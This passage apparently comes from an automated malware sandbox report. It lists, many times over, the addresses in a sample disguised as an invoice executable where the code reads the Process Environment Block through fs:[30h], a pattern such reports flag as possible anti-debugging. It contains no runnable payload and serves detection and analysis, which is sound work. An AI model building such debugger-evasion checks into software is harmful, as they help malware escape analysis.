          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011461C3 mov eax, dword ptr fs:[00000030h]4_2_011461C3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011461C3 mov eax, dword ptr fs:[00000030h]4_2_011461C3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE1D0 mov eax, dword ptr fs:[00000030h]4_2_010FE1D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE1D0 mov eax, dword ptr fs:[00000030h]4_2_010FE1D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE1D0 mov ecx, dword ptr fs:[00000030h]4_2_010FE1D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE1D0 mov eax, dword ptr fs:[00000030h]4_2_010FE1D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE1D0 mov eax, dword ptr fs:[00000030h]4_2_010FE1D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011561E5 mov eax, dword ptr fs:[00000030h]4_2_011561E5
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B01F8 mov eax, dword ptr fs:[00000030h]4_2_010B01F8
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01104000 mov ecx, dword ptr fs:[00000030h]4_2_01104000
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01122000 mov eax, dword ptr fs:[00000030h]4_2_01122000
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01122000 mov eax, dword ptr fs:[00000030h]4_2_01122000
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01122000 mov eax, dword ptr fs:[00000030h]4_2_01122000
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01122000 mov eax, dword ptr fs:[00000030h]4_2_01122000
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01122000 mov eax, dword ptr fs:[00000030h]4_2_01122000
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01122000 mov eax, dword ptr fs:[00000030h]4_2_01122000
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01122000 mov eax, dword ptr fs:[00000030h]4_2_01122000
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01122000 mov eax, dword ptr fs:[00000030h]4_2_01122000
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109E016 mov eax, dword ptr fs:[00000030h]4_2_0109E016
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109E016 mov eax, dword ptr fs:[00000030h]4_2_0109E016
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109E016 mov eax, dword ptr fs:[00000030h]4_2_0109E016
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109E016 mov eax, dword ptr fs:[00000030h]4_2_0109E016
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01116030 mov eax, dword ptr fs:[00000030h]4_2_01116030
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107A020 mov eax, dword ptr fs:[00000030h]4_2_0107A020
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107C020 mov eax, dword ptr fs:[00000030h]4_2_0107C020
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01106050 mov eax, dword ptr fs:[00000030h]4_2_01106050
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01082050 mov eax, dword ptr fs:[00000030h]4_2_01082050
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AC073 mov eax, dword ptr fs:[00000030h]4_2_010AC073
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108208A mov eax, dword ptr fs:[00000030h]4_2_0108208A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010780A0 mov eax, dword ptr fs:[00000030h]4_2_010780A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011460B8 mov eax, dword ptr fs:[00000030h]4_2_011460B8
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011460B8 mov ecx, dword ptr fs:[00000030h]4_2_011460B8
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011180A8 mov eax, dword ptr fs:[00000030h]4_2_011180A8
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011020DE mov eax, dword ptr fs:[00000030h]4_2_011020DE
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010880E9 mov eax, dword ptr fs:[00000030h]4_2_010880E9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0107A0E3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011060E0 mov eax, dword ptr fs:[00000030h]4_2_011060E0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107C0F0 mov eax, dword ptr fs:[00000030h]4_2_0107C0F0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C20F0 mov ecx, dword ptr fs:[00000030h]4_2_010C20F0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA30B mov eax, dword ptr fs:[00000030h]4_2_010BA30B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA30B mov eax, dword ptr fs:[00000030h]4_2_010BA30B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA30B mov eax, dword ptr fs:[00000030h]4_2_010BA30B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107C310 mov ecx, dword ptr fs:[00000030h]4_2_0107C310
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A0310 mov ecx, dword ptr fs:[00000030h]4_2_010A0310
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01128350 mov ecx, dword ptr fs:[00000030h]4_2_01128350
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114A352 mov eax, dword ptr fs:[00000030h]4_2_0114A352
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110035C mov eax, dword ptr fs:[00000030h]4_2_0110035C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110035C mov eax, dword ptr fs:[00000030h]4_2_0110035C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110035C mov eax, dword ptr fs:[00000030h]4_2_0110035C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110035C mov ecx, dword ptr fs:[00000030h]4_2_0110035C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110035C mov eax, dword ptr fs:[00000030h]4_2_0110035C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110035C mov eax, dword ptr fs:[00000030h]4_2_0110035C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01102349 mov eax, dword ptr fs:[00000030h]4_2_01102349
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0115634F mov eax, dword ptr fs:[00000030h]4_2_0115634F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112437C mov eax, dword ptr fs:[00000030h]4_2_0112437C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A438F mov eax, dword ptr fs:[00000030h]4_2_010A438F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A438F mov eax, dword ptr fs:[00000030h]4_2_010A438F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107E388 mov eax, dword ptr fs:[00000030h]4_2_0107E388
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107E388 mov eax, dword ptr fs:[00000030h]4_2_0107E388
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107E388 mov eax, dword ptr fs:[00000030h]4_2_0107E388
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01078397 mov eax, dword ptr fs:[00000030h]4_2_01078397
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01078397 mov eax, dword ptr fs:[00000030h]4_2_01078397
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01078397 mov eax, dword ptr fs:[00000030h]4_2_01078397
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011243D4 mov eax, dword ptr fs:[00000030h]4_2_011243D4
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011243D4 mov eax, dword ptr fs:[00000030h]4_2_011243D4
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A3C0 mov eax, dword ptr fs:[00000030h]4_2_0108A3C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A3C0 mov eax, dword ptr fs:[00000030h]4_2_0108A3C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A3C0 mov eax, dword ptr fs:[00000030h]4_2_0108A3C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A3C0 mov eax, dword ptr fs:[00000030h]4_2_0108A3C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A3C0 mov eax, dword ptr fs:[00000030h]4_2_0108A3C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A3C0 mov eax, dword ptr fs:[00000030h]4_2_0108A3C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010883C0 mov eax, dword ptr fs:[00000030h]4_2_010883C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010883C0 mov eax, dword ptr fs:[00000030h]4_2_010883C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010883C0 mov eax, dword ptr fs:[00000030h]4_2_010883C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010883C0 mov eax, dword ptr fs:[00000030h]4_2_010883C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E3DB mov eax, dword ptr fs:[00000030h]4_2_0112E3DB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E3DB mov eax, dword ptr fs:[00000030h]4_2_0112E3DB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E3DB mov ecx, dword ptr fs:[00000030h]4_2_0112E3DB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E3DB mov eax, dword ptr fs:[00000030h]4_2_0112E3DB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011063C0 mov eax, dword ptr fs:[00000030h]4_2_011063C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0113C3CD mov eax, dword ptr fs:[00000030h]4_2_0113C3CD
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010903E9 mov eax, dword ptr fs:[00000030h]4_2_010903E9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010903E9 mov eax, dword ptr fs:[00000030h]4_2_010903E9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010903E9 mov eax, dword ptr fs:[00000030h]4_2_010903E9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010903E9 mov eax, dword ptr fs:[00000030h]4_2_010903E9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010903E9 mov eax, dword ptr fs:[00000030h]4_2_010903E9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010903E9 mov eax, dword ptr fs:[00000030h]4_2_010903E9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010903E9 mov eax, dword ptr fs:[00000030h]4_2_010903E9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010903E9 mov eax, dword ptr fs:[00000030h]4_2_010903E9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B63FF mov eax, dword ptr fs:[00000030h]4_2_010B63FF
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109E3F0 mov eax, dword ptr fs:[00000030h]4_2_0109E3F0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109E3F0 mov eax, dword ptr fs:[00000030h]4_2_0109E3F0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109E3F0 mov eax, dword ptr fs:[00000030h]4_2_0109E3F0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107823B mov eax, dword ptr fs:[00000030h]4_2_0107823B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0113A250 mov eax, dword ptr fs:[00000030h]4_2_0113A250
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0113A250 mov eax, dword ptr fs:[00000030h]4_2_0113A250
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0115625D mov eax, dword ptr fs:[00000030h]4_2_0115625D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01086259 mov eax, dword ptr fs:[00000030h]4_2_01086259
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01108243 mov eax, dword ptr fs:[00000030h]4_2_01108243
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01108243 mov ecx, dword ptr fs:[00000030h]4_2_01108243
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107A250 mov eax, dword ptr fs:[00000030h]4_2_0107A250
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01130274 mov eax, dword ptr fs:[00000030h]4_2_01130274
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01084260 mov eax, dword ptr fs:[00000030h]4_2_01084260
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01084260 mov eax, dword ptr fs:[00000030h]4_2_01084260
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01084260 mov eax, dword ptr fs:[00000030h]4_2_01084260
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107826B mov eax, dword ptr fs:[00000030h]4_2_0107826B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE284 mov eax, dword ptr fs:[00000030h]4_2_010BE284
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE284 mov eax, dword ptr fs:[00000030h]4_2_010BE284
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01100283 mov eax, dword ptr fs:[00000030h]4_2_01100283
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01100283 mov eax, dword ptr fs:[00000030h]4_2_01100283
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01100283 mov eax, dword ptr fs:[00000030h]4_2_01100283
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011162A0 mov eax, dword ptr fs:[00000030h]4_2_011162A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011162A0 mov ecx, dword ptr fs:[00000030h]4_2_011162A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011162A0 mov eax, dword ptr fs:[00000030h]4_2_011162A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011162A0 mov eax, dword ptr fs:[00000030h]4_2_011162A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011162A0 mov eax, dword ptr fs:[00000030h]4_2_011162A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011162A0 mov eax, dword ptr fs:[00000030h]4_2_011162A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011562D6 mov eax, dword ptr fs:[00000030h]4_2_011562D6
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A2C3 mov eax, dword ptr fs:[00000030h]4_2_0108A2C3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A2C3 mov eax, dword ptr fs:[00000030h]4_2_0108A2C3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A2C3 mov eax, dword ptr fs:[00000030h]4_2_0108A2C3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A2C3 mov eax, dword ptr fs:[00000030h]4_2_0108A2C3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A2C3 mov eax, dword ptr fs:[00000030h]4_2_0108A2C3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010902E1 mov eax, dword ptr fs:[00000030h]4_2_010902E1
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010902E1 mov eax, dword ptr fs:[00000030h]4_2_010902E1
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010902E1 mov eax, dword ptr fs:[00000030h]4_2_010902E1
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01116500 mov eax, dword ptr fs:[00000030h]4_2_01116500
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154500 mov eax, dword ptr fs:[00000030h]4_2_01154500
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154500 mov eax, dword ptr fs:[00000030h]4_2_01154500
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154500 mov eax, dword ptr fs:[00000030h]4_2_01154500
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154500 mov eax, dword ptr fs:[00000030h]4_2_01154500
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154500 mov eax, dword ptr fs:[00000030h]4_2_01154500
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154500 mov eax, dword ptr fs:[00000030h]4_2_01154500
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154500 mov eax, dword ptr fs:[00000030h]4_2_01154500
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE53E mov eax, dword ptr fs:[00000030h]4_2_010AE53E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE53E mov eax, dword ptr fs:[00000030h]4_2_010AE53E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE53E mov eax, dword ptr fs:[00000030h]4_2_010AE53E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE53E mov eax, dword ptr fs:[00000030h]4_2_010AE53E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE53E mov eax, dword ptr fs:[00000030h]4_2_010AE53E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090535 mov eax, dword ptr fs:[00000030h]4_2_01090535
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090535 mov eax, dword ptr fs:[00000030h]4_2_01090535
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090535 mov eax, dword ptr fs:[00000030h]4_2_01090535
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090535 mov eax, dword ptr fs:[00000030h]4_2_01090535
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090535 mov eax, dword ptr fs:[00000030h]4_2_01090535
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090535 mov eax, dword ptr fs:[00000030h]4_2_01090535
